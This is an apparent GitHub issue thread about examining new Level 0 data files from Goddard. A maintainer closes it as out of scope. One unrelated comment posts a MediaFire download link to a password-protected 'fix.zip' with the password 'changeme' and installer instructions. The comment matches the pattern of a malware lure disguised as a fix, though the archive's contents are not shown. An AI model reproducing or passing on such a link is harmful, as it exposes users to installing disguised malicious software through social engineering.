### ISSUE TITLE
Examine new Level 0 files from Goddard

### ISSUE THREAD

**Issue by stscijgbot-rstdms** [spacetelescope/rad#435]
_Issue [RAD-173](https://jira.stsci.edu/browse/RAD-173) was created on JIRA by [Christine Heller-Boyer](https://jira.stsci.edu/secure/ViewProfile.jspa?name=heller):_

Find newest data See if there are differences from previous deliveries See if I can process data

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PaulHuwe** [comment]
This is not a RAD issue. Closing.
